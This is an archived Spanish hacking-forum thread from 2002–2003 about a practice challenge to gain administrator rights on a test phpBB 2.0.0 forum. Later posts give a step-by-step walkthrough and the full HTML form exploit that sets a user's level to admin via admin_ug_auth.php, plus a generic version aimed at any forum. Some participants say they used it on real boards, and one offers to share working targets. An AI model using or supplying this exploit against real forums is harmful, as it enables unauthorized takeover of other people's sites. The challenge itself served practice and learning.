PDA

Ver la versión completa : Prueba: Escalada de privilegios en phpBB 2.0.0



TseTse
03-12-2002, 15:02
A ver, voy a ir haciendo cosas de estas para que vayais practicando.
La prueba no tiene ningun premio ni nada, simplemente es para que practiqueis.

Consiste en crearse un usuario, y hacer que el usuario que has creado tenga permisos de Administrador.

Normas:
- Registrarse con el mismo usuario que aquí.
- Demostrar que lo has conseguido con una captura de pantalla.

Durará 3 días la prueba esta. Después de esos 3 días borraré el phpbb.

http://usuarios.lycos.es/hhpruebas/phpbb/index.php

Primer puesto: Th3_Cr0w http://usuarios.lycos.es/hhpruebas/phpbbcr0w.jpg
Segundo puesto: Lazaro http://usuarios.lycos.es/hhpruebas/phpbblazaro.jpg
Tercer puesto: TrEKu http://usuarios.lycos.es/hhpruebas/phpbbtreku.jpg
Cuarto puesto: revolloso http://usuarios.lycos.es/hhpruebas/phpbbrevolloso.png
Quinto puesto: kerozene http://usuarios.lycos.es/hhpruebas/phpbbkerozene.gif
Sexto puesto: eXcalibur http://usuarios.lycos.es/hhpruebas/phpbbexcalibur.jpg
Séptimo puesto: 01decowar http://usuarios.lycos.es/hhpruebas/phpbb01decowar.jpg

La prueba ha finalizado!, para ver la solución ir a http://www.hackhispano.com/foro/showthread.php?s=&postid=24475&t=9618#post24475

TseTse

THE_CROW
03-12-2002, 15:36
muy buena tio. Esta tarde me registro y lo intento :D. Gracias por la prueba.

Achilipu
03-12-2002, 17:57
Buena prueba, gracias TseTse.
Quien lo consiga, podria explicar como lo hace y que pasos ha seguido, para que aprendamos todos sobre esto.
Muxas gracias tio.

TseTse
03-12-2002, 19:03
¿Todavia no lo ha conseguido nadie?
Mira que es fácil.... xDD la respuesta está en google.com
Venga que es muy fácil!

TseTse

THE_CROW
03-12-2002, 19:38
si ya lo tengo. La putada es el inglés, que no hay dios que entienda el bug :D .Ahora cojo el diccionario :P

TseTse
03-12-2002, 19:40
Jajaja yo ya lo tengo traducido para cuando haga la explicación.

PD. No deis pistas! xDD

TseTse

THE_CROW
03-12-2002, 19:44
te invito a un :0= si me lo pasas. Te lo cambio por la versión en inglés!! Jisjis cagüen to.

Esto empieza a funcionar....:D A ver si acabo de una vez :P

THE_CROW
03-12-2002, 20:00
yuhuuuu!! Terminado. Ahora pongo la captura de pantalla:D :D :D :D :D

Coño q no me deja subir la captura mi puta cuenta. AGGG!!!

juanma.m.d
03-12-2002, 20:31
Eyya toy registrado voy a ver, the crow please no postees la solucion todavia dame media horita hasta q me rinda o lo haga anda. toy atento:rolleyes: weno SALU2 y tse tse espero q hagas ams de estas y tengan una mayor acogida

TseTse
03-12-2002, 20:32
Enseñame una captura del panel de Administración :)
Subela a cualquier lado, iespana, lycos, todos estos aceptan imágenes.

TseTse

THE_CROW
03-12-2002, 20:54
Aqui está. Por fin la subí, q asco de server x( He ganado!! Y el premio???xD
http://usuarios.lycos.es/hhpruebas/phpbbcr0w.jpg

TseTse
03-12-2002, 21:06
Muy bien!
¿A que era fácil?

Has ganado un año gratis de inglés en cualquier academia Opening (a ver quien pilla el chiste) xDDD

TseTse

THE_CROW
03-12-2002, 21:10
cual de los dos chistes que lleva implícito??? Que soy un burro y necesito el inglés, o que las academias opening son más fiables que un coche de los cincuenta a 200km/h por una autopista??? :D.

Si que era fácil, si. Cuando quieras y puedas pones más que así uno aprende bastante :P

juanma.m.d
03-12-2002, 21:12
oki oye mirad a ver si es esto ...

Editado: No deis pistas! xD

Lo he copiado hasta con la publi :P. Xq oo hago y no me va

TseTse
03-12-2002, 21:15
Podria ser o no ser, pruebalo y saldrás de dudas :P

TseTse

Lazaro
03-12-2002, 21:31
Joer, pues yo tampoco se q hago mal, pq hasta hago logout y todo antes de mandar el formul. Pero cuando intento hacer login de nuevo sigo sin tener privilegios.
:( :(

Lazaro
03-12-2002, 21:43
Pozi ya lo tengo!!!

:0= (solo uno q me lo merezco).

Ahora a ver si encuentro un capturador de pantallas.

Y a ver si pones + de éstas Tse-Tse, q están muy bien.

juanma.m.d
03-12-2002, 21:58
lazaro es alguna tonteria¿

Lazaro
03-12-2002, 22:02
no, simplemente q ya terminé.

TseTse
03-12-2002, 22:18
lazaro,

Le das a el botón impr petsis del teclado y te captura la pantalla, luego con un editor de imágenes ke das a edición pegar y lo guardas como jpg o gif (nada de bmp)

TseTse

Lazaro
03-12-2002, 22:25
Ahora comprendo lo q decía juanma (tierra trágame!!!):D :D

Vale, ya sabeis de uno q no sabía como capturar una pantalla sin un capturador de imágenes, q triste :( :( :(

Lazaro
03-12-2002, 22:35
http://usuarios.lycos.es/hhpruebas/phpbblazaro.jpg

teniais razón q no era muy dificil (lo hizo alguien q no sabía ni capturar una imagen) :D

Tse-Tse gracias x la prueba, he pasado un buen rato.

TseTse
03-12-2002, 22:42
Felicidades a tí también.

Procurad hacer como Th3_Cr0w (clickar en el enlace 'forums index') es para que no se vean las IPs de los concursantes.

TseTse

juanma.m.d
03-12-2002, 22:55
a mi me da igual q se sepa mi ip...

juanma.m.d
03-12-2002, 23:17
Lazaro keria decir q si es una tonteria una vez q tienes el exploit y rellenas todo bye

MrDC
03-12-2002, 23:31
como diablos se utiliza un exploit???

scomo se vera soy principiante, pero me latio el aprender algo nuevo.

:( :(

THE_CROW
04-12-2002, 02:14
leete el exploit y te será muy fácil.Es verdad, yo la foto de pantalla q hice fué adrede para que se viera el menú de administrador pero no las IPs. TseTse has triunfado :D

TrEKu
04-12-2002, 02:55
Sorry que llego tarde pero me apunte hoy y lo vi hace un ratillo ...

Pero weno hay queda eso...

http://usuarios.lycos.es/hhpruebas/phpbbtreku.jpg

o tb pinchando aki....

Fotito_de_la_Jaikeda (http://usuarios.lycos.es/hhpruebas/phpbbtreku.jpg)


Ale Besitos y Wuen curro con la prueba.... XDD

Lazaro
04-12-2002, 11:03
Procurad hacer como Th3_Cr0w (clickar en el enlace 'forums index') es para que no se vean las IPs de los concursantes

Ok, de todas formas la imagen está cortada y ya me fijé en que no se vieran las IPs completas.

|NaZgÛl|
04-12-2002, 13:27
Seria bastante bueno, a mi entender que alguien se dedique a hacer este tipo de "pruebitas", pero quien es el que tiene tiempo?

Intentaré hacer alguna sobre Apache, MySLQ, o algo parecido.

No prometo nada, que estas épocas uno está ocupado, que hay que estudiar!!.

POSIX
04-12-2002, 13:29
por si alguien no lo ha encontrado todavia, el exploit viene en un mensaje de la xxxxx el xx xxx es xxxxx si no me equivoco que lo vi ayer.

Editado: No dar pistas

eXcalibur
04-12-2002, 14:46
Ups, llego tarde para el juego.

CrAcKzMe
04-12-2002, 15:23
yo no tengo time ni pa hacer las pruebas ni pa resolverlas xD

Achilipu
04-12-2002, 16:07
Vale Posix, pero como encontrar ese exploit?
Cuando salio la prueba, busque en google exploits para phpbb, y encontre uno, con explicacion y todo, para la version 2, lo hice, pero no me funciono, no se que he hecho mal o si ese exploit ya no sirve.
Y ahora Posix, que dices que el bug tiene de xx xxxxxx, donde lo encuentro? He buscado en google, en xxxxxxxx, pero no encuentro nada.
Cuando termine la prueba, necesito la explicacion please.
Gracias de nuevo a TseTse por la prueba, muy buena.;)

revolloso
04-12-2002, 19:25
Puta madre, jajajja, yo hubiera sido el primero, de no haber sido por un puto error de esa madrola, jajajaj, ahora si que fue error del error, jajajaaj.

http://usuarios.lycos.es/hhpruebas/phpbbrevolloso.png

Ni pecs, me conformare con un cuarto puesto ;)

Si yo sabia que no estaba loco, lo estaba haciendo todo bien, nomas que quien sabe que pasaba, pero bueno, lo unico que hize, fue volverme a registrar y listo :D hasta hay un usuario mio tambien que es "que_caray", ese soy yo tambien, para ver si era realmente lo que pensaba, y si, asi fue.

Hay se los dejo :p

TseTse
04-12-2002, 23:12
Felicidades a los dos TrEKu y revolloso!

TseTse

juanma.m.d
04-12-2002, 23:53
revolloso me diste una pista.. pero no tengo tiempo

THE_CROW
05-12-2002, 01:53
coño que es simple script kidding :D

ramgo
05-12-2002, 03:52
Vale llegue tarde, apenas me estoy registrando....

TseTse
05-12-2002, 04:58
Mientras preparo unas pruebas que tengo en mente, para ganar tiempo y que no esteis parados, mañana postearé una (más fácil que la del phpbb) de 'Password Cracking'. Consistirá en crackear archivos (uno de cada) de las siguientes aplicaciones:
- WinZIP
- WinRAR
- WinACE
- Adobe PDF
- Word 2000
- Excel 2000
Con esta, depende de la participación que tenga, veremos como en algunas ocasiones no es cosa de 'poténcia' sino de 'maña' o lo que es lo mismo, personas que tienen menos 'máquina' que vosotros y saca el password en menos tiempo. Por supuesto que también es cosa de suerte xD

Si alguno tiene sugeréncias para una nueva prueba (con fundamentos) que me lo diga por mensaje privado y veremos que se puede hacer.

TseTse

kerozene
05-12-2002, 06:33
Lo logre! muy bueno Tse Tse, me diverti un ratito

http://usuarios.lycos.es/hhpruebas/phpbbkerozene.gif

PD: ya estoy preparando yo un desafio para todos ustedes ;) se viene se viene ....

eXcalibur
05-12-2002, 12:39
Bueno, yo me he dado una vuelta por la red y la verdad es que caen basicamente todos los boards

http://usuarios.lycos.es/hhpruebas/phpbbexcalibur.jpg

Les pegué un toque, hay que ser buenos. jajaja

THE_CROW
05-12-2002, 14:47
a mi no me quitas los privilegios marica!!:D :D :D .

01decowar
05-12-2002, 20:26
Lastima!!! He visto tarde la prueba.

Bueno, aqui teneis mi colaboracion:

http://usuarios.lycos.es/hhpruebas/phpbb01decowar.jpg

kerozene
05-12-2002, 20:55
me perdi algun msg en el que dieron el pass? o como es que suben las imagenes a ese serv0 ?

juanma.m.d
05-12-2002, 21:00
kerozene eso es xq han obtenido privilegios de admin

kerozene
05-12-2002, 21:25
no man! consiguieron privilegio de admin del foro, no del sitio, segun veo es porque TseTse los sube y edita los posts con la nueva ubicacion

juanma.m.d
06-12-2002, 11:27
am , es q pense q a o mejor a los admins les permitian subirt cosas al server... sALU2

TseTse
06-12-2002, 11:53
Pues la prueba ya se ha acabado, ahora os voy a explicar como se hacia.
El exploit fue creado por http://www.rootsecure.net y es allí donde se encuentra en versión HTML y versión PERL. Te bajabas el exploit a tu disco duro y seguias las instrucciones (traduzco del inglés al español, se da por hecho que ya te has creado el usuario):

1. Ir al foro en el que quieres cambiarte los permisos, usando el navegador.
2. Buscar el directorio base del phpBB que en la prueba era http://usuarios.lycos.es/hhpruebas/phpbb, llegados aquí, hay que editar el código html del exploit y en la parte donde pone <form method="post" action="http://www.base_url_here.com/admin/admin_ug_auth.php">
cambiarlo por; <form method="post" action="http://usuarios.lycos.es/hhpruebas/phpbb/admin/admin_ug_auth.php">.
3. Ir a la lista de miembros.
4. Buscar tu usuario ir al perfil de tu usuario y memorizar el user id que se ve en la barra del navegador concretamente la parte de "u=?", donde '?' es un número, el id del usuario.
5. Como estamos dentro de foro (hemos hecho login) tenemos que darle a logout por fuerza, sino no funcionará y nos saldrá un mensaje que no tenemos permisos.
6. Introducir tu user id en el exploit y seleccionar el nivel que deseamos tener (en este caso Administrador), dale a submit y ya está.

Os llevará a una pantalla de login que teneis que ignorar, si quereis ir a el panel de administración, hacedlo desde el enlace que hay debajo de los foros 'Go to Administration Panel'.

A continuación os pego el código del formulario, que lo teneis que guardar en HTML para poder usarlo:

<FORM action=http://usuarios.lycos.es/hhpruebas/phpbb/admin/admin_ug_auth.php
method=post>
<P>User Level : <SELECT name=userlevel> <OPTION value=admin
selected>Administrator</OPTION> <OPTION
value=user>User</OPTION></SELECT></P><INPUT type=hidden value=0 name=private[1]>
<INPUT type=hidden value=0 name=moderator[1]> <INPUT type=hidden value=user
name=mode> <INPUT type=hidden name=adv> User ID: <INPUT size=5 name=u> <BR><INPUT class=mainoption type=submit value=Submit name=submit> <INPUT class=liteoption type=reset value=Reset name=reset> </FORM>

TseTse

ZaNN
06-12-2002, 12:07
Si no has borrado ningun usuario es el numeor de debajo la columna # no??? joder podias dejarlo un rato mas, me akabo de poner y no funciona la page ya...:(

TseTse
06-12-2002, 12:24
Si, así es. Lo dejaré hasta esta noche, aún no lo he mirado pero supongo que seguirá vivo xDD vamos que yo no he tocado nada de momento.

TseTse

ZaNN
06-12-2002, 12:47
Pos a mi no se me abre ya, weno desde hace hora y media, si no te kuesta mucho ponla de nuevo, sino pos na ke se le va a hacer! asias por la prueba me lo toy pasando de pm

TseTse
06-12-2002, 13:14
Funciona perfectamente, pero lo voy a borrar, si quereis probarlo, os podeis bajar el phpbb que he usado yo de http://prdownloads.sourceforge.net/phpbb/phpBB-2.0.0.tar.gz?use_mirror=unc os creais una cuenta en lycos y lo instalais, así podeis hacer vustras pruebas :P

TseTse

jocanor
03-01-2003, 21:03
me podrias explicar un poco mejor todo esto del phpbb i k es esto del bug?

Lazaro
03-01-2003, 21:15
pues es un foro programado en php de código libre (si lo buscas por el google seguro q encuentras algún sitio de donde bajártelo).

El problema q presenta, es q con un simple formulario HTML (Tse Tse te indica de donde bajarlo, sino en google viene), se pueden conseguir privilegios de administrador en el foro.

saludos

jocanor
03-01-2003, 21:17
osea, para poner en practica lo dicho, hay k bajarse el phpbb?

otra cosa, ya me baje el xploit del enlace k puso tsetse, i lo k hay son muchos archivos con la extension php

Lazaro
03-01-2003, 21:22
los archivos ".php" son el foro.

El exploit es un archivo .html

Antes, Tse-Tse tenía colgado el foro pero creo q ya lo quitó.

unos posts + atrás:

El exploit fue creado por http://www.rootsecure.net y es allí donde se encuentra en versión HTML y versión PERL

y si no lo encuentras ahí (supongo q si pero no mire) con buscarlo en el google seguro q te aparece

jocanor
03-01-2003, 21:24
muchas gracias por tu ayuda lazaro!!!!!!!

jocanor
03-01-2003, 21:35
pero es k no lo acabo de entender, entonces para k sirve bajarse el foro...no dijo tsetse k era desde el navegador?


debo estar torpe estos dias, pero esto no lo acabo de entender bien, agradeceria k alguien me explicara el proceso detalladamente...

TseTse
03-01-2003, 23:03
A ver, la prueba terminó y borré el foro. Por lo que si quereis practicar, teneis que bajaros el phpbb 2.0.0 e instalarlo en lycos por ejemplo y luego usar el exploit. Todo eso por vuestra cuenta.

TseTse

uNDrCraSh
23-05-2003, 02:29
bueno, por si a alguien le da por probarlo les publico el Xploit aki, no se si estara correcto, ya que no es de la pagina oficial donde lo encontro Tse Tse, un saludo

#html>
#head>
#/head>
#body>
#form method="post"
action="http://www.server.com/RUTA AL FORO/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
#option value="admin">Administrator</option>
#option value="user">User</option></select>
#input type="hidden" name="private[1]" value="0">
#input type="hidden" name="moderator[1]" value="0">
#input type="hidden" name="mode" value="user">
#input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
#input type="submit" name="submit" value="Submit">
#/form>
#/body>
#/html>

<PICCOLO>
23-05-2003, 08:16
tres o cuatro posts mas atrás lo había puesto Tse Tse

Por cierto, ya os pasaré unas cuantas direcciones con las que funciona

-salu2-

yoguuu
08-07-2003, 03:30
obviamente si el foro phpbb2.0.0 tiene oculto lo de ir al panel de administracion en la pagina principal, abajo del todo ,.......mmm si no lo tiene no se deberia poder acceder al panel , no ??

si estoy ekivocado please....explicarme en ke por ke sino.....hay algo ke no me cuadra


gracias

<PICCOLO>
08-07-2003, 11:22
siendo administrador puedes entrar en el menú de administración de la siguiente forma, sin necesidad de que aparezca enlace

antes de hacer login:
directorio_del_foro/admin/index.php

despues de hacer login:
debes copiar de la barra de direcciones donde pone sid= ...... lo copias y entras en la dirección:
directorio_del_foro/admin/index.php?sid=....

salu2

yoguuu
09-07-2003, 09:16
gracias picolo , en teoria ya se eso... pues yo tengo 2 foros xDD (vbulletin) , pero simplemente no se me ocurrio XD

ueno.... asias por la aclaracion ;)


PD: Mu buen xploit

urystation
02-08-2003, 13:30
5. Como estamos dentro de foro (hemos hecho login) tenemos que darle a logout por fuerza, sino no funcionará y nos saldrá un mensaje que no tenemos permisos.

esa parte no la entendi....me la podes explicar mejor??



ademas yolo hago todo bien...hago bien el exploit pongo el numero...,sale la pagina esa de login pero no veo el link..."go to administation panel'" .................cmo le hago?


gracias